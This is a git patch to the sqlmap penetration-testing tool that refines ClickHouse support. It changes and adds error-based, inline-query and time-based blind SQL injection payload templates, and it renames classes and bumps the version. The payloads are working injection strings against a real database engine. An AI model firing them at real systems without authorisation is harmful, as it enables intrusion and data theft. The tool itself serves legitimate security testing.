From 30ba167cc1506fa6531c84383428d5bb30d81412 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 3 Feb 2023 23:56:50 +0100 Subject: [PATCH] Some more fixes related to ClickHouse support (#5229) --- data/xml/errors.xml | 5 +++-- data/xml/payloads/error_based.xml | 32 ++++++++++++++++++++++------- data/xml/payloads/inline_query.xml | 10 ++++----- data/xml/payloads/time_blind.xml | 26 +++++++++++++++++++---- data/xml/queries.xml | 4 ++-- lib/controller/handler.py | 6 +++--- lib/core/settings.py | 2 +- plugins/dbms/clickhouse/__init__.py | 2 +- 8 files changed, 62 insertions(+), 25 deletions(-) diff --git a/data/xml/errors.xml b/data/xml/errors.xml index b78dd91c6..4993a8ae8 100644 --- a/data/xml/errors.xml +++ b/data/xml/errors.xml @@ -211,8 +211,9 @@ - - + + + diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml index 6cc089d09..9b1d2725f 100644 --- a/data/xml/payloads/error_based.xml +++ b/data/xml/payloads/error_based.xml @@ -838,7 +838,7 @@ IBM DB2 OR error-based - WHERE or HAVING clause 2 4 - 1 + 3 1 1 OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') @@ -853,23 +853,41 @@ - - Clickhouse AND error-based - Parameter replace + ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause 2 - 2 + 3 1 1,2,3,9 1 - AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]' AS String) + AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') - AND [RANDNUM]=CAST('[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]' AS String) + AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
- Clickhouse + ClickHouse +
+
+ + + ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause + 2 + 4 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') + + OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ ClickHouse
diff --git a/data/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml index 8e3b91f70..7269be695 100644 --- a/data/xml/payloads/inline_query.xml +++ b/data/xml/payloads/inline_query.xml @@ -135,21 +135,21 @@ - Clickhouse inline queries + ClickHouse inline queries 3 - 2 + 3 1 1,2,3,8 3 - (SELECT '[DELIMITER_START]'||CAST(([QUERY]), 'String')||'[DELIMITER_STOP]') + ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]') - (SELECT '[DELIMITER_START]'||CAST((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)), 'String')||'[DELIMITER_STOP]') + ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
- Clickhouse + ClickHouse
diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index 944ec8008..5de31ec45 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -1494,12 +1494,30 @@ + + ClickHouse AND time-based blind (heavy query) + 5 + 4 + 1 + 1,2,3 + 1 + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) + + AND [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(1000000)) + + + + +
+ ClickHouse +
+
- Clickhouse AND time-based blind (heavy query) - fuzzBits + ClickHouse OR time-based blind (heavy query) 5 - 3 - 1 + 5 + 3 1,2,3 1 OR [RANDNUM]=(SELECT COUNT(fuzzBits('[RANDSTR]', 0.001)) FROM numbers(if(([INFERENCE]), 1000000, 1))) @@ -1510,7 +1528,7 @@
- Clickhouse + ClickHouse
diff --git a/data/xml/queries.xml b/data/xml/queries.xml index 82570ce7e..a3e006ccb 100644 --- a/data/xml/queries.xml +++ b/data/xml/queries.xml @@ -1319,7 +1319,7 @@
- + @@ -1331,7 +1331,7 @@ - + diff --git a/lib/controller/handler.py b/lib/controller/handler.py index 0e3c1999f..1c4994e84 100644 --- a/lib/controller/handler.py +++ b/lib/controller/handler.py @@ -47,8 +47,8 @@ from plugins.dbms.altibase.connector import Connector as AltibaseConn from plugins.dbms.altibase import AltibaseMap from plugins.dbms.cache.connector import Connector as CacheConn from plugins.dbms.cache import CacheMap -from plugins.dbms.clickhouse.connector import Connector as ClickhouseConn -from plugins.dbms.clickhouse import ClickhouseMap +from plugins.dbms.clickhouse.connector import Connector as ClickHouseConn +from plugins.dbms.clickhouse import ClickHouseMap from plugins.dbms.cratedb.connector import Connector as CrateDBConn from plugins.dbms.cratedb import CrateDBMap from plugins.dbms.cubrid.connector import Connector as CubridConn @@ -125,7 +125,7 @@ def setHandler(): (DBMS.PRESTO, PRESTO_ALIASES, PrestoMap, PrestoConn), (DBMS.ALTIBASE, ALTIBASE_ALIASES, AltibaseMap, AltibaseConn), (DBMS.MIMERSQL, MIMERSQL_ALIASES, MimerSQLMap, MimerSQLConn), - (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickhouseMap, ClickhouseConn), + (DBMS.CLICKHOUSE, CLICKHOUSE_ALIASES, ClickHouseMap, ClickHouseConn), (DBMS.CRATEDB, CRATEDB_ALIASES, CrateDBMap, CrateDBConn), (DBMS.CUBRID, CUBRID_ALIASES, CubridMap, CubridConn), (DBMS.CACHE, CACHE_ALIASES, CacheMap, CacheConn), diff --git a/lib/core/settings.py b/lib/core/settings.py index 4009d625c..9d224253a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from thirdparty import six from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.7.2.2" +VERSION = "1.7.2.3" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/clickhouse/__init__.py b/plugins/dbms/clickhouse/__init__.py index 873a0bb1b..a4a131442 100755 --- a/plugins/dbms/clickhouse/__init__.py +++ b/plugins/dbms/clickhouse/__init__.py @@ -16,7 +16,7 @@ from plugins.dbms.clickhouse.syntax import Syntax from plugins.dbms.clickhouse.takeover import Takeover from plugins.generic.misc import Miscellaneous -class ClickhouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): +class ClickHouseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): """ This class defines ClickHouse methods """